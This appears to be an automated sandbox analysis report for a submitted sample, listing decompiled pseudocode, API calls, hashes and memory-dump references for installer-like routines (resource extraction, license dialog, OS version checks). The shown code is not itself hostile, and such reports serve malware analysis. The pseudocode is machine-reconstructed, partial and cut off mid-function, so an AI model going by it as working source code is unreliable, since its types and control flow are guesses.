                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        0x00e843d0
                                                                                                                                                                                                        0x00e843d8
                                                                                                                                                                                                        0x00e843df
                                                                                                                                                                                                        0x00e843e6
                                                                                                                                                                                                        0x00e843ec
                                                                                                                                                                                                        0x00e843f1
                                                                                                                                                                                                        0x00e84400
                                                                                                                                                                                                        0x00e84403
                                                                                                                                                                                                        0x00e8440b
                                                                                                                                                                                                        0x00e84420
                                                                                                                                                                                                        0x00e84429
                                                                                                                                                                                                        0x00e84437
                                                                                                                                                                                                        0x00e84444
                                                                                                                                                                                                        0x00e84447
                                                                                                                                                                                                        0x00e8444d
                                                                                                                                                                                                        0x00e84454
                                                                                                                                                                                                        0x00e8445b
                                                                                                                                                                                                        0x00e84460
                                                                                                                                                                                                        0x00e84461
                                                                                                                                                                                                        0x00e84467
                                                                                                                                                                                                        0x00e8446f
                                                                                                                                                                                                        0x00e84473
                                                                                                                                                                                                        0x00e84473
                                                                                                                                                                                                        0x00e84463
                                                                                                                                                                                                        0x00e84463
                                                                                                                                                                                                        0x00e84463
                                                                                                                                                                                                        0x00e8447a
                                                                                                                                                                                                        0x00e84481
                                                                                                                                                                                                        0x00e84484
                                                                                                                                                                                                        0x00e8448a
                                                                                                                                                                                                        0x00e84492
                                                                                                                                                                                                        0x00e84496
                                                                                                                                                                                                        0x00e84496
                                                                                                                                                                                                        0x00e84486
                                                                                                                                                                                                        0x00e84486
                                                                                                                                                                                                        0x00e84486
                                                                                                                                                                                                        0x00e844b8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E843F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E8440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00E84423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00E8442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00E8443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00E84447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00E844A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: b057e1f43aaed479ed4255b4584ddca714980400fd36f12606016d1a6bac7740
                                                                                                                                                                                                        • Instruction ID: cfc791948e183201817698e5db4caac4ae3828e0d751d50ed450bb99d27dc2d0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b057e1f43aaed479ed4255b4584ddca714980400fd36f12606016d1a6bac7740
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4316072E00119AFDB14DFB9DD889EEBBB5EB89310F194169F819F3290DA306D058B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E00E86298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E00E8171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0xe8a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E00E8171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E00E86CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x00e86298
                                                                                                                                                                                                        0x00e862a0
                                                                                                                                                                                                        0x00e862a7
                                                                                                                                                                                                        0x00e862ad
                                                                                                                                                                                                        0x00e862af
                                                                                                                                                                                                        0x00e862bb
                                                                                                                                                                                                        0x00e862c3
                                                                                                                                                                                                        0x00e862c4
                                                                                                                                                                                                        0x00e8633b
                                                                                                                                                                                                        0x00e8633b
                                                                                                                                                                                                        0x00e86345
                                                                                                                                                                                                        0x00e8634d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e862da
                                                                                                                                                                                                        0x00e862de
                                                                                                                                                                                                        0x00e8635f
                                                                                                                                                                                                        0x00e86369
                                                                                                                                                                                                        0x00e862e0
                                                                                                                                                                                                        0x00e862e0
                                                                                                                                                                                                        0x00e862e0
                                                                                                                                                                                                        0x00e862e3
                                                                                                                                                                                                        0x00e862e5
                                                                                                                                                                                                        0x00e862e5
                                                                                                                                                                                                        0x00e862e8
                                                                                                                                                                                                        0x00e862e8
                                                                                                                                                                                                        0x00e862ea
                                                                                                                                                                                                        0x00e862eb
                                                                                                                                                                                                        0x00e862ef
                                                                                                                                                                                                        0x00e862f1
                                                                                                                                                                                                        0x00e862f3
                                                                                                                                                                                                        0x00e86302
                                                                                                                                                                                                        0x00e86308
                                                                                                                                                                                                        0x00e8630d
                                                                                                                                                                                                        0x00e86314
                                                                                                                                                                                                        0x00e86314
                                                                                                                                                                                                        0x00e86316
                                                                                                                                                                                                        0x00e86319
                                                                                                                                                                                                        0x00e86355
                                                                                                                                                                                                        0x00e86357
                                                                                                                                                                                                        0x00e8631b
                                                                                                                                                                                                        0x00e8631b
                                                                                                                                                                                                        0x00e86331
                                                                                                                                                                                                        0x00e86334
                                                                                                                                                                                                        0x00e86339
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86339
                                                                                                                                                                                                        0x00e86319
                                                                                                                                                                                                        0x00e8636b
                                                                                                                                                                                                        0x00e8637d
                                                                                                                                                                                                        0x00e8637d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8171E: _vsnprintf.MSVCRT ref: 00E81750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00E851CA,00000004,00000024,00E82F71,?,00000002,00000000), ref: 00E862CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E851CA,00000004,00000024,00E82F71,?,00000002,00000000), ref: 00E862D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E851CA,00000004,00000024,00E82F71,?,00000002,00000000), ref: 00E8631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00E86345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E851CA,00000004,00000024,00E82F71,?,00000002,00000000), ref: 00E86357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: 715bd661e444e8b559209cbcd2408383429ddd8faa782a9c1d397ec1098005e0
                                                                                                                                                                                                        • Instruction ID: 1d0b36a406ca9eae0e169e246c87189512394738243bc44b9c05c6984bd09bf8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 715bd661e444e8b559209cbcd2408383429ddd8faa782a9c1d397ec1098005e0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A121F671A00219AFDB10AFA5DC499FFBB7DEB84714B04116AF90EB3251DB359D068BE0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E83A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
                                                                                                                                                                                                        				_t1 = E00E8468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0xe88d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E00E8468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0xe88d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0xe88d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xe89124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E00E86517(_t19, 0x7d1, 0, E00E83100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0xe88d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xe89124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0xe88d4c);
                                                                                                                                                                                                        					 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xe89124 = E00E86285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x00e83a46
                                                                                                                                                                                                        0x00e83a57
                                                                                                                                                                                                        0x00e83a5d
                                                                                                                                                                                                        0x00e83a63
                                                                                                                                                                                                        0x00e83a6a
                                                                                                                                                                                                        0x00e83a91
                                                                                                                                                                                                        0x00e83a9a
                                                                                                                                                                                                        0x00e83ad8
                                                                                                                                                                                                        0x00e83b13
                                                                                                                                                                                                        0x00e83b19
                                                                                                                                                                                                        0x00e83b1b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83b21
                                                                                                                                                                                                        0x00e83ae7
                                                                                                                                                                                                        0x00e83af4
                                                                                                                                                                                                        0x00e83afc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83afe
                                                                                                                                                                                                        0x00e83a87
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83a87
                                                                                                                                                                                                        0x00e83aa8
                                                                                                                                                                                                        0x00e83ab3
                                                                                                                                                                                                        0x00e83ab9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83ab9
                                                                                                                                                                                                        0x00e83a78
                                                                                                                                                                                                        0x00e83a82
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E82F64,?,00000002,00000000), ref: 00E83A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00E83AB3
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                          • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00E83AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00E83B13
                                                                                                                                                                                                          • Part of subcall function 00E86517: FindResourceA.KERNEL32(00E80000,000007D6,00000005), ref: 00E8652A
                                                                                                                                                                                                          • Part of subcall function 00E86517: LoadResource.KERNEL32(00E80000,00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E86538
                                                                                                                                                                                                          • Part of subcall function 00E86517: DialogBoxIndirectParamA.USER32(00E80000,00000000,00000547,00E819E0,00000000), ref: 00E86557
                                                                                                                                                                                                          • Part of subcall function 00E86517: FreeResource.KERNEL32(00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E86560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00E83100,00000000,00000000), ref: 00E83AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: 76f03d41539df78b67c2f678a0feafefedf95153ee68de33919fe2afb06c2a3d
                                                                                                                                                                                                        • Instruction ID: 68ecbb49dc94d2937571aaa3228c6ffe4dbda48efb10c505e8d0b85555845173
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76f03d41539df78b67c2f678a0feafefedf95153ee68de33919fe2afb06c2a3d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1711B170601201AFD724BF73AD09E273AFDDBD5B00B14643EB94DFA1E1DA7988059721
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E824E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E00E8658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00e824e0
                                                                                                                                                                                                        0x00e824eb
                                                                                                                                                                                                        0x00e824f2
                                                                                                                                                                                                        0x00e824f7
                                                                                                                                                                                                        0x00e82504
                                                                                                                                                                                                        0x00e8250e
                                                                                                                                                                                                        0x00e8251d
                                                                                                                                                                                                        0x00e8252c
                                                                                                                                                                                                        0x00e82541
                                                                                                                                                                                                        0x00e82546
                                                                                                                                                                                                        0x00e82553
                                                                                                                                                                                                        0x00e82555
                                                                                                                                                                                                        0x00e82555
                                                                                                                                                                                                        0x00e82546
                                                                                                                                                                                                        0x00e8256c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00E82506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00E8252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 00E8253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00E8254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00E82555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: 66c199207d3590949c0c1dc2e58fb5b0b4e5ffd2fac86d40ff9fe5abd80f71d2
                                                                                                                                                                                                        • Instruction ID: 027f373bdb5514d14d028bfef5fc23496e3d4adaf60896796b5980f23fb7bfcd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66c199207d3590949c0c1dc2e58fb5b0b4e5ffd2fac86d40ff9fe5abd80f71d2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F0152326002186BD720AB669D09EDBBBBDDB45760F040165FA4DF7190DA748E4A8B92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00E836EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0xe88184 = 1;
                                                                                                                                                                                                        						 *0xe88180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0xe89a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0xe88a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E00E82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E00E82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
